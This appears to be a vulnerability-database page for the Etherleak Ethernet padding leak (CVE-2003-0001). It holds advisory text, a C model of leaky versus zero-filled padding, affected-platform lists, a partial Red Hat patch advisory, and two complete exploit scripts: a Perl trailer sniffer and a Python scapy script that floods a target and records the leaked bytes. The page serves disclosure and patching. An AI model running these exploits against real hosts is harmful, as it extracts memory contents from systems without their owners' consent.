CVE-2003-0001
CVSS 5.0
Published: 2003-01-17 00:00:00
Revised: 2016-12-06 21:59:04

[Original] Multiple ethernet Network Interface Card (NIC) device drivers do not pad frames with null bytes, which allows remote attackers to obtain information from previous packets or kernel memory by using malformed packets, as demonstrated by Etherleak.


[CNNVD] Multiple vendor network device driver frame padding information disclosure vulnerability (CNNVD-200301-027)

        
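        Network device drivers pad packet data that is shorter than 46 bytes.
        Several network device drivers pad packets with data from previous frame buffers, and a remote attacker can exploit this vulnerability to obtain sensitive information from affected devices.
        The Ethernet standard (IEEE 802.3) defines a minimum data field of 46 bytes. If a higher-layer protocol such as IP supplies a packet shorter than 46 bytes, the device driver must pad the data field to meet the minimum frame size required by IEEE 802, and the padding value is normally NULL data. Many Ethernet device drivers, however, do not follow the standard correctly: they do not pad with NULL bytes and instead reuse previously transmitted frame data as padding. Because Ethernet frame buffers are allocated in kernel memory space, analysing this padding can reveal sensitive system information.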
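
An added illustration, not code from the advisory or from any real driver: a user-space C model of the transmit-buffer reuse described above, with the leaky padding path beside the zero-filling one. The `tx_slot` structure, the function names, the MAC addresses and the sample payload are all constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define ETH_HLEN     14                        /* dst MAC + src MAC + EtherType */
#define ETH_DATA_MIN 46                        /* minimum data field (IEEE 802.3) */
#define ETH_ZLEN     (ETH_HLEN + ETH_DATA_MIN) /* 60 bytes on the wire, FCS excluded */
#define TX_BUF_SIZE  1514

/* Hypothetical transmit slot that a driver reuses for every outgoing frame. */
struct tx_slot {
    uint8_t buf[TX_BUF_SIZE];
    size_t  len;                               /* bytes handed to the hardware */
};

typedef size_t (*tx_prepare_fn)(struct tx_slot *, const uint8_t *, size_t);

/* Flawed path: the length is raised to the minimum, but the bytes between
 * the end of the new frame and ETH_ZLEN still hold the previous frame. */
static size_t tx_prepare_leaky(struct tx_slot *s, const uint8_t *frame, size_t len)
{
    if (len > TX_BUF_SIZE)
        return 0;
    memcpy(s->buf, frame, len);
    s->len = len < ETH_ZLEN ? ETH_ZLEN : len;
    return s->len;
}

/* Corrected path: the padding region is explicitly filled with NULL bytes. */
static size_t tx_prepare_padded(struct tx_slot *s, const uint8_t *frame, size_t len)
{
    if (len > TX_BUF_SIZE)
        return 0;
    memcpy(s->buf, frame, len);
    if (len < ETH_ZLEN) {
        memset(s->buf + len, 0, ETH_ZLEN - len);
        len = ETH_ZLEN;
    }
    s->len = len;
    return s->len;
}

/* Check a defender can apply to a captured frame: count non-zero bytes
 * between the end of the real data and the end of the transmitted frame. */
static size_t nonzero_pad_bytes(const struct tx_slot *s, size_t data_len)
{
    size_t i, count = 0;
    for (i = data_len; i < s->len; i++)
        if (s->buf[i] != 0)
            count++;
    return count;
}

/* Build a frame with constructed addresses and a local experimental EtherType. */
static size_t build_frame(uint8_t *out, size_t cap, const char *payload)
{
    static const uint8_t hdr[ETH_HLEN] = {
        0x02, 0x00, 0x00, 0x00, 0x00, 0x02,    /* destination (constructed) */
        0x02, 0x00, 0x00, 0x00, 0x00, 0x01,    /* source (constructed) */
        0x88, 0xb5                             /* IEEE local experimental EtherType */
    };
    size_t n = strlen(payload);
    if (ETH_HLEN + n > cap)
        return 0;
    memcpy(out, hdr, ETH_HLEN);
    memcpy(out + ETH_HLEN, payload, n);
    return ETH_HLEN + n;
}

/* Constructed sample data standing in for an earlier, sensitive frame. */
static const char SAMPLE_EARLIER[] =
    "user=alice;token=CONSTRUCTED-SECRET-0001;session=constructed-sample";

/* Send a long frame, then a 1-byte-payload frame through the same slot,
 * and report how many padding bytes of the short frame are non-zero. */
static size_t demo(tx_prepare_fn prepare)
{
    struct tx_slot slot;
    uint8_t frame[TX_BUF_SIZE];
    size_t n;

    memset(&slot, 0, sizeof slot);
    n = build_frame(frame, sizeof frame, SAMPLE_EARLIER);
    prepare(&slot, frame, n);
    n = build_frame(frame, sizeof frame, "x");
    prepare(&slot, frame, n);
    return nonzero_pad_bytes(&slot, n);
}

int main(void)
{
    printf("leaky path:  %zu stale bytes in padding\n", demo(tx_prepare_leaky));
    printf("padded path: %zu stale bytes in padding\n", demo(tx_prepare_padded));
    return 0;
}
```

The same non-zero-trailer test, applied to frames seen on the wire, is what separates an affected sender from one that pads correctly.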
        

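- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions for exploitation]
Attack vector: NETWORK [the attacker does not need intranet access or local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-200 [Information Exposure]

- CPE (affected platforms and products)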

cpe:/o:netbsd:netbsd:1.6  NetBSD 1.6
cpe:/o:netbsd:netbsd:1.5  NetBSD 1.5
cpe:/o:linux:linux_kernel:2.4.20  Linux Kernel 2.4.20
cpe:/o:microsoft:windows_2000:::server
cpe:/o:netbsd:netbsd:1.5.1  NetBSD 1.5.1
cpe:/o:microsoft:windows_2000_terminal_services
cpe:/o:linux:linux_kernel:2.4.14  Linux Kernel 2.4.14
cpe:/o:linux:linux_kernel:2.4.3  Linux Kernel 2.4.3
cpe:/o:linux:linux_kernel:2.4.13  Linux Kernel 2.4.13
cpe:/o:linux:linux_kernel:2.4.2  Linux Kernel 2.4.2
cpe:/o:microsoft:windows_2000::sp2:professional  Microsoft Windows 2000 Professional SP2
cpe:/o:linux:linux_kernel:2.4.19  Linux Kernel 2.4.19
cpe:/o:linux:linux_kernel:2.4.16  Linux Kernel 2.4.16
cpe:/o:linux:linux_kernel:2.4.15  Linux Kernel 2.4.15
cpe:/o:microsoft:windows_2000::sp2:datacenter_server  Microsoft Windows 2000 Datacenter Server SP2
cpe:/o:linux:linux_kernel:2.4.1  Linux Kernel 2.4.1
cpe:/o:linux:linux_kernel:2.4.12  Linux Kernel 2.4.12
cpe:/o:linux:linux_kernel:2.4.11  Linux Kernel 2.4.11
cpe:/o:linux:linux_kernel:2.4.18  Linux Kernel 2.4.18
cpe:/o:linux:linux_kernel:2.4.17  Linux Kernel 2.4.17
cpe:/o:linux:linux_kernel:2.4.5  Linux Kernel 2.4.5
cpe:/o:linux:linux_kernel:2.4.4  Linux Kernel 2.4.4
cpe:/o:microsoft:windows_2000::sp1:datacenter_server  Microsoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp1:server  Microsoft Windows 2000 Server SP1
cpe:/o:freebsd:freebsd:4.7  FreeBSD 4.7
cpe:/o:linux:linux_kernel:2.4.9  Linux Kernel 2.4.9
cpe:/o:freebsd:freebsd:4.6  FreeBSD 4.6
cpe:/o:linux:linux_kernel:2.4.8  Linux Kernel 2.4.8
cpe:/o:freebsd:freebsd:4.5  FreeBSD 4.5
cpe:/o:linux:linux_kernel:2.4.10  Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.4.7  Linux Kernel 2.4.7
cpe:/o:freebsd:freebsd:4.4  FreeBSD 4.4
cpe:/o:linux:linux_kernel:2.4.6  Linux Kernel 2.4.6
cpe:/o:freebsd:freebsd:4.3  FreeBSD 4.3
cpe:/o:freebsd:freebsd:4.2  FreeBSD 4.2
cpe:/o:microsoft:windows_2000::sp2:server  Microsoft Windows 2000 Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_server  Microsoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp2:advanced_server  Microsoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000_terminal_services::sp1
cpe:/o:microsoft:windows_2000::sp1:professional  Microsoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000_terminal_services::sp2
cpe:/o:netbsd:netbsd:1.5.2  NetBSD 1.5.2
cpe:/o:netbsd:netbsd:1.5.3  NetBSD 1.5.3
cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000:::datacenter_server

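- OVAL (technical details for detection)

oval:org.mitre.oval:def:2665  Data Leak in NIC
oval:org.mitre.oval:def:28706  Critical Patch Update January 2015
*OVAL describes in detail how to detect this vulnerability; more technical detail on detecting it can be found in the related OVAL definitions.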

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0001
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0001
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200301-027
(Official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0016.html
(UNKNOWN)  VULNWATCH  20030110 More information regarding Etherleak
http://marc.info/?l=bugtraq&m=104222046632243&w=2
(UNKNOWN)  BUGTRAQ  20030110 More information regarding Etherleak
http://www.atstake.com/research/advisories/2003/a010603-1.txt
(VENDOR_ADVISORY)  ATSTAKE  A010603-1
http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf
(UNKNOWN)  MISC  http://www.atstake.com/research/advisories/2003/atstake_etherleak_report.pdf
http://www.kb.cert.org/vuls/id/412115
(VENDOR_ADVISORY)  CERT-VN  VU#412115
http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
(UNKNOWN)  CONFIRM  http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html
http://www.redhat.com/support/errata/RHSA-2003-025.html
(UNKNOWN)  REDHAT  RHSA-2003:025
http://www.redhat.com/support/errata/RHSA-2003-088.html
(UNKNOWN)  REDHAT  RHSA-2003:088
http://www.securityfocus.com/archive/1/archive/1/305335/30/26420/threaded
(UNKNOWN)  BUGTRAQ  20030106 Etherleak: Ethernet frame padding information leakage (A010603-1)
http://www.securityfocus.com/archive/1/archive/1/307564/30/26270/threaded
(UNKNOWN)  BUGTRAQ  20030117 Re: More information regarding Etherleak
http://www.securitytracker.com/id/1031583
(UNKNOWN)  SECTRACK  1031583

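- Vulnerability information

Multiple vendor network device driver frame padding information disclosure vulnerability
Medium risk  Design error
2003-01-17 00:00:00 2005-10-20 00:00:00
Remote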
        
        

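- Advisories and patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Temporarily use encryption such as SSL, IPSEC or SSH to transmit sensitive data. This is not a complete solution, because the padding is not always taken from previous frame-buffer data; it may also be unencrypted IP header information or other kernel memory.
        Vendor patches:
        Atstake
        -------
        Atstake has published a security advisory (A010603-1) for this issue:
        A010603-1: Etherleak: Ethernet frame padding information leakage
        Link:
        http://www.atstake.com/research/advisories/2003/a010603-1.txt

        No vendor has provided a patch yet.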

- Vulnerability information (3555)

Ethernet Device Drivers Frame Padding Info Leakage Exploit (Etherleak) (EDBID:3555)
multiple remote
2007-03-23 Verified
0 Jon Hart
N/A [Click to download]
#!/usr/bin/perl -w
# etherleak, code that has been 5 years coming.
#
# On 04/27/2002, I disclosed on the Linux Kernel Mailing list,
# a vulnerability that would become known as the 'etherleak' bug.  In
# various situations an ethernet frame must be padded to reach a specific
# size or fall on a certain boundary.  This task is left up to the driver
# for the ethernet device.  The RFCs state that this padding must consist
# of NULLs.  The bug is that at the time and still to this day, many device
# drivers do not pad with NULLs, but rather pad with unsanitized portions
# of kernel memory, oftentimes exposing sensitive information to remote
# systems or those savvy enough to coerce their targets to do so.
#
# Proof of this can be found by googling for 'warchild and etherleak', or
# by visiting:
#
#  http://lkml.org/lkml/2002/4/27/101
#
# This was ultimately fixed in the Linux kernel, but over time this
# vulnerability reared its head numerous times, but at the core the
# vulnerability was the same as the one I originally published.  The most
# public of these was CVE-2003-0001, which was assigned to address an
# official @stake advisory.
#
# This code can be found in its most current form at:
#  
#  http://spoofed.org/files/exploits/etherleak
#
# Jon Hart <jhart@spoofed.org>, March 2007
#

use strict;
use diagnostics;
use warnings;
use Getopt::Long;
use Net::Pcap;
use NetPacket::Ethernet qw(:ALL);
use NetPacket::IP qw(:ALL);

my %opts = ();
my ($iface, $err, $pcap_t, $pcap_save, $filter_string); 

# GetOptions has already reported the bad option; show usage and exit non-zero.
GetOptions( \%opts, 'help', 'filter=s', 'interface=s', 'quiet', 'read=s', 'write=s', 'verbose') or
            do { &usage(); exit(1); };

if (defined($opts{'help'})) {
   &usage();
   exit(0);
}

if (defined($opts{'read'})) {
   $pcap_t = Net::Pcap::open_offline($opts{'read'}, \$err);
   if (!defined($pcap_t)) {
      print("Net::Pcap::open_offline failed: $err\n");
      exit 1;
   }
} else {
   if (defined($opts{'interface'})) {
      $iface = $opts{'interface'};
   } else {
      $iface = Net::Pcap::lookupdev(\$err);
      if (defined($err)) {
         print(STDERR "lookupdev() failed: $err\n");
         exit(1);
      } else {
         print(STDERR "No interface specified.  Using $iface\n");
      }
   }

   $pcap_t = Net::Pcap::open_live($iface, 65535, 1, 0, \$err);
   if (!defined($pcap_t)) {
      print("Net::Pcap::open_live failed on $iface: $err\n");
      exit 1;
   }
}

my $filter;
if (Net::Pcap::compile($pcap_t, \$filter, defined($opts{'filter'}) ? $opts{'filter'} : "", 0, 0) == -1) {
   printf("Net::Pcap::compile failed: %s\n", Net::Pcap::geterr($pcap_t));
   exit(1);
}

if (Net::Pcap::setfilter($pcap_t, $filter) == -1) {
   printf("Net::Pcap::setfilter failed: %s\n", Net::Pcap::geterr($pcap_t));
   exit(1);
}

if (defined($opts{'write'})) {
   $pcap_save = Net::Pcap::dump_open($pcap_t, $opts{'write'});
   if (!defined($pcap_save)) {
      printf("Net::Pcap::dump_open failed: %s\n", Net::Pcap::geterr($pcap_t));
      exit(1);
   }
}

Net::Pcap::loop($pcap_t, -1, \&process, "foo");
Net::Pcap::close($pcap_t);

if (defined($opts{'write'})) {
   Net::Pcap::dump_close($pcap_save);
}



sub process {
   my ($user, $hdr, $pkt) = @_;
   my ($link, $ip);
   my $jump = 0;

   my $datalink = Net::Pcap::datalink($pcap_t);
   if    ($datalink == 1) { $jump += 14; }
   elsif ($datalink == 113) { $jump += 16; }
   else { printf("Skipping datalink $datalink\n"); return; }

   my $l2 = NetPacket::Ethernet->decode($pkt);
   
   if ($l2->{type} == ETH_TYPE_IP) {
      $ip = NetPacket::IP->decode(eth_strip($pkt));
      $jump += $ip->{len};
   } elsif ($l2->{type} == ETH_TYPE_ARP) { $jump += 28; }
   else { 
      # assume 802.3 ethernet, and just jump ahead the length
      for ($l2->{dest_mac}) {
         if (/^0180c200/) {
            # spanning tree
            # l2->{type} here will actually be the length.  HACK.
            $jump += $l2->{type};
         }
         elsif (/^01000ccccc/) {
            # CDP/VTP/DTP/PAgP/UDLD/PVST, etc
            # l2->{type} here will actually be the length.  HACK.
            $jump += $l2->{type};
         } elsif (/^ab0000020000/) {
            # DEC-MOP-Remote-Console
            return;
         } else {
            # loopback
            if ($l2->{src_mac} eq $l2->{dest_mac}) { return; }
            printf("Skipping datalink $datalink l2 type %s\n", $l2->{type}); return;
         }
      }
   }


   if ($hdr->{len} > $jump) {
      my $trailer_bin = substr($pkt, $jump);
      my $trailer_hex = "";
      my $trailer_ascii = "";
      foreach (split(//, $trailer_bin)) {
         $trailer_hex .= sprintf("%02x", ord($_));
         if (ord($_) >= 32 && ord($_) <= 126) {
            $trailer_ascii .= $_;
         } else { $trailer_ascii .= "."; }
      }
      # ignore all trailers that are just single characters repeated.
      # most OS' use 0, F, 5 or a.
      unless ($trailer_hex =~ /^(0|5|f|a)\1*$/i) {
         unless ($opts{'quiet'}) {
            print("#"x80, "\n");
            printf("%s -> %s\n", $l2->{src_mac}, $l2->{dest_mac});
            if ($l2->{type} == ETH_TYPE_IP) {
               printf("%s -> %s\n", $ip->{src_ip}, $ip->{dest_ip});
            }
         }
         print("$trailer_hex\t$trailer_ascii\n");
         if (defined($opts{'write'})) {
            Net::Pcap::dump($pcap_save, $hdr, $pkt);
         }
      }
   }
}

sub usage {
   print <<EOF;
$0 -- A demonstration of the infamous 'etherleak' bug.

   CVE-2003-0001, and countless repeats of the same vulnerability.

   Options:
   [-h|--help]                  # this message
   [-i|--interface] <interface> # interface to listen on
   [-f|--filter] <pcap filter>  # apply this filter to the traffic
   [-r|--read] <path to pcap>   # read from this saved pcap file
   [-w|--write] <path to pcap>  # write to this saved pcap file
   [-q|--quiet]                 # be quiet
   [-v|--verbose]               # be verbose

EOF


}

# milw0rm.com [2007-03-23]
		

- Vulnerability information (22131)

Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure (EDBID:22131)
unix remote
2007-03-23 Verified
0 Jon Hart
N/A [Click to download]
source: http://www.securityfocus.com/bid/6535/info

Network device drivers for several vendors have been reported to disclose potentially sensitive information to attackers.

Frames that are smaller than the minimum frame size should have the unused portion of the frame buffer padded with null (or other) bytes. Some device drivers fail to do this adequately, leaving the data that was stored in the memory comprising the buffer prior to its use intact. Consequently, this data may be transmitted within frames across Ethernet segments. Since the Ethernet frame buffer is allocated in kernel memory space, sensitive data may be leaked.

Cisco has stated that the IOS 12.1 and 12.2 trains are not affected.

National Semiconductor Ethernet controller chips are not vulnerable to this issue. 

		

- Vulnerability information (26076)

Cisco ASA < 8.4.4.6|8.2.5.32 Ethernet Information Leak (EDBID:26076)
2013-06-10 Not Verified
prdelka
N/A [Click to download]
#!/usr/bin/env python
# CVE-2003-0001 'Etherleak' exploit
# =================================
# Exploit for hosts which use a network device driver that pads 
# ethernet frames with data which vary from one packet to another, 
# likely taken from kernel memory, system memory allocated to 
# the device driver, or a hardware buffer on its network interface 
# card. Exploit uses scapy with either ICMP or ARP requests as 
# this can trigger with either but ICMP can hit layer3 filtering 
# rules. Using ARP the padding appears to leak only fixed constant 
# values when exploited, ICMP leaks random bytes. 
#
# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky
# WARNING: No route found for IPv6 destination :: (no default route?)
# [ CVE-2003-0001 'Etherleak' exploit
# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex
# ............................................................^C!Killing
# !Killing
# root@bt:~/0d# hexdump -C leaky | head
# 00000000  e6 bd a6 9b 90 eb 44 f5  18 a5 29 2a 16 5a 08 ff  |......D...)*.Z..|
# 00000010  43 e1 23 07 8f 96 5a 24  3f 3d 33 7d b4 97 7e 18  |C.#...Z$?=3}..~.|
# 00000020  05 c9 7c 2c a5 c0 fa 7a  76 f3 51 c0 fe 07 72 32  |..|,...zv.Q...r2|
# 00000030  9e ad 6a 67 ad 43 58 17  60 43 bc 2b b8 fb cc 70  |..jg.CX.`C.+...p|
# 00000040  99 92 80 84 03 03 6f 8f  18 d3 5b 5e f0 1e 3a 83  |......o...[^..:.|
# 00000050  3d 82 e7 cd 3e 1f 31 74  b0 06 8c a2 7e 14 6b fb  |=...>.1t....~.k.|
# 00000060  72 9b ac 64 74 9b a4 d9  23 5b 92 82 0d 0b 31 f0  |r..dt...#[....1.|
# 00000070  a9 4f dd 3f bf 2b 5c 67  6c 22 fa da d0 2b d6 39  |.O.?.+\gl"...+.9|
# 00000080  40 58 13 4f 3d bb 48 03  d3 53 3c 5c 44 d2 3d b2  |@X.O=.H..S<\D.=.|
# 00000090  4f f2 a9 4a 02 80 4e 1b  6c bd 69 89 bd 76 1b 0a  |O..J..N.l.i..v..|
#
# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference
# is CSCua88376 and PSIRT-0669464365.
#
#  -- prdelka
#
import os
import sys
import signal
import binascii
from scapy.all import *

def signalhandler(signal,id):
	print "!Killing"
	sys.exit(0)

def spawn(host,type):
	if type == 'arp':
		send(ARP(pdst=host),loop=1,nofilter=1)
	elif type == 'icmp':
		send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)		

if __name__ == "__main__":
	print "[ CVE-2003-0001 'Etherleak' exploit"
	signal.signal(signal.SIGINT,signalhandler)
	if len(sys.argv) < 4:
		print "[ No! Use with <host> <arp|icmp> <file>"
		sys.exit(1)
	type = sys.argv[2]
	if type == 'arp':
		pass
	elif type == 'icmp':
		pass
	else:
		print "Bad type!"
		sys.exit(0)
	pid = os.fork()
	if(pid):
		print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
		spawn(sys.argv[1],sys.argv[2])
	while True:
		if type == 'arp':
			myfilter = "host %s and arp" % sys.argv[1]
		elif type == 'icmp':
			myfilter = "host %s and icmp" % sys.argv[1]
		x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
		p = x[0]
		if type == 'arp':
			pad = p.getlayer(2)
		if type == 'icmp':
			pad = p.getlayer(4)
		leak =  str(pad)
		hexfull = binascii.b2a_hex(leak)
		file = "%s.hex"%sys.argv[3]
		fdesc = open(file,"a")
		fdesc.write(hexfull + "\n")
		fdesc.close()
		# 32 bits leaked here for me.
		if type == 'icmp':
			bytes = leak[9:13]
		elif type == 'arp':
			bytes = leak[10:14]
		fdesc = open(sys.argv[3],"ab")
		fdesc.write(bytes)
		fdesc.close()		

- Vulnerability information (F30783)

RHSA-2003:025-20.txt (PacketStormID:F30783)
2003-02-05 00:00:00
Red Hat Security  redhat.com
kernel
linux,redhat
CVE-2003-0001
[Click to download]

Red Hat Security Advisory RHSA-2003:025-20 - Updated kernel packages for Red Hat Linux 7.1, 7.2, 7.3, and 8.0 have been made available that fix an information leak from several ethernet drivers (reported by Atstake), and a file system issue.

MD5: ad4bcd14084f3d01eb9e28be1f56df4e

---------------------------------------------------------------------
                   Red Hat, Inc. Red Hat Security Advisory

Synopsis:          Updated 2.4 kernel fixes various vulnerabilities
Advisory ID:       RHSA-2003:025-20
Issue date:        2003-01-24
Updated on:        2003-02-03
Product:           Red Hat Linux
Keywords:          ethernet frame padding O_DIRECT
Cross references:
Obsoletes:         RHBA-2002:292
CVE Names:         CAN-2003-0001 CAN-2003-0018
---------------------------------------------------------------------

1. Topic:

Updated kernel packages for Red Hat Linux 7.1, 7.2, 7.3, and 8.0 are now
available that fix an information leak from several ethernet drivers, and
a file system issue.

2. Relevant releases/architectures:

Red Hat Linux 7.1 - athlon, i386, i586, i686
Red Hat Linux 7.2 - athlon, i386, i586, i686
Red Hat Linux 7.3 - athlon, i386, i586, i686
Red Hat Linux 8.0 - athlon, i386, i586, i686

3. Problem description:

The Linux kernel handles the basic functions of the operating system.
Vulnerabilities have been found in version 2.4.18 of the kernel.  This
advisory deals with updates to Red Hat Linux 7.1, 7.2, 7.3, and 8.0.

Multiple ethernet Network Interface Card (NIC) device drivers do not pad
frames with null bytes, which allows remote attackers to obtain information
from previous packets or kernel memory by using malformed packets.  The
Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned
the name CAN-2003-0001 to this issue.

A vulnerability exists in O_DIRECT handling in Linux kernels 2.4.10 and
later that can create a limited information leak where any user on the
system with write privileges to a file system can read information from
that file system (from previously deleted files), and can create minor file
system corruption (easily repaired by fsck).  Red Hat Linux in its default
configuration is not affected by this bug, because the ext3 file system
(the default file system in Red Hat Linux 7.2 and later) does not support
the O_DIRECT feature.  Of the kernels Red Hat has released, only the 2.4.18
kernels have this bug.  The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2003-0018 to this issue.

Users of the ext2 file system can migrate to the ext3 file system
using the tune2fs program as described in the white paper at
http://www.redhat.com/support/wpapers/redhat/ext3/

All users of Red Hat Linux 7.1, 7.2, 7.3, and 8.0 should upgrade
to these errata packages, which contain patches to ethernet drivers to
remove the information leak and a patch to fix O_DIRECT handling.

In addition, the following drivers are upgraded to support newer hardware:
3c59x, e100, e1000, tg3

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied, especially the additional
packages from RHSA-2002:205 and RHSA-2002:206 respectively.

The procedure for upgrading the kernel manually is documented at:

http://www.redhat.com/support/docs/howto/kernel-upgrade/

Please read the directions for your architecture carefully before
proceeding with the kernel upgrade.

Please note that this update is also available via Red Hat Network. Many
people find this to be an easier way to apply updates. To use Red Hat
Network, launch the Red Hat Update Agent with the following command:

up2date

This will start an interactive process that will result in the appropriate
RPMs being upgraded on your system. Note that you need to select the kernel
explicitly on default configurations of up2date.

5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):

76159 - Errata kernel 2.4.18-17.8.0 fails PCI resource allocation

6. RPMs required:

Red Hat Linux 7.1:

SRPMS:
ftp://updates.redhat.com/7.1/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm

athlon:
ftp://updates.redhat.com/7.1/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm
ftp://updates.redhat.com/7.1/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm

i386:
ftp://updates.redhat.com/7.1/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm
ftp://updates.redhat.com/7.1/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm

i586:
ftp://updates.redhat.com/7.1/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm
ftp://updates.redhat.com/7.1/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm

i686:
ftp://updates.redhat.com/7.1/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm
ftp://updates.redhat.com/7.1/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm
ftp://updates.redhat.com/7.1/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm
ftp://updates.redhat.com/7.1/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm

Red Hat Linux 7.2:

SRPMS:
ftp://updates.redhat.com/7.2/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm

athlon:
ftp://updates.redhat.com/7.2/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm
ftp://updates.redhat.com/7.2/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm

i386:
ftp://updates.redhat.com/7.2/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm
ftp://updates.redhat.com/7.2/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm

i586:
ftp://updates.redhat.com/7.2/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm
ftp://updates.redhat.com/7.2/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm

i686:
/>ftp://updates.redhat.com/7.2/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.2/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.2/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.2/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br /><br />Red Hat Linux 7.3:<br /><br />SRPMS:<br />ftp://updates.redhat.com/7.3/en/os/SRPMS/kernel-2.4.18-24.7.x.src.rpm<br /><br />athlon:<br />ftp://updates.redhat.com/7.3/en/os/athlon/kernel-2.4.18-24.7.x.athlon.rpm<br />ftp://updates.redhat.com/7.3/en/os/athlon/kernel-smp-2.4.18-24.7.x.athlon.rpm<br /><br />i386:<br />ftp://updates.redhat.com/7.3/en/os/i386/kernel-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.3/en/os/i386/kernel-source-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.3/en/os/i386/kernel-doc-2.4.18-24.7.x.i386.rpm<br />ftp://updates.redhat.com/7.3/en/os/i386/kernel-BOOT-2.4.18-24.7.x.i386.rpm<br /><br />i586:<br />ftp://updates.redhat.com/7.3/en/os/i586/kernel-2.4.18-24.7.x.i586.rpm<br />ftp://updates.redhat.com/7.3/en/os/i586/kernel-smp-2.4.18-24.7.x.i586.rpm<br /><br />i686:<br />ftp://updates.redhat.com/7.3/en/os/i686/kernel-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.3/en/os/i686/kernel-smp-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.3/en/os/i686/kernel-bigmem-2.4.18-24.7.x.i686.rpm<br />ftp://updates.redhat.com/7.3/en/os/i686/kernel-debug-2.4.18-24.7.x.i686.rpm<br /><br />Red Hat Linux 8.0:<br /><br />SRPMS:<br />ftp://updates.redhat.com/8.0/en/os/SRPMS/kernel-2.4.18-24.8.0.src.rpm<br /><br />athlon:<br />ftp://updates.redhat.com/8.0/en/os/athlon/kernel-2.4.18-24.8.0.athlon.rpm<br />ftp://updates.redhat.com/8.0/en/os/athlon/kernel-smp-2.4.18-24.8.0.athlon.rpm<br /><br />i386:<br />ftp://updates.redhat.com/8.0/en/os/i386/kernel-2.4.18-24.8.0.i386.rpm<br />ftp://updates.redhat.com/8.0/en/os/i386/kernel-source-2.4.18-24.8.0.i386.rpm<br 
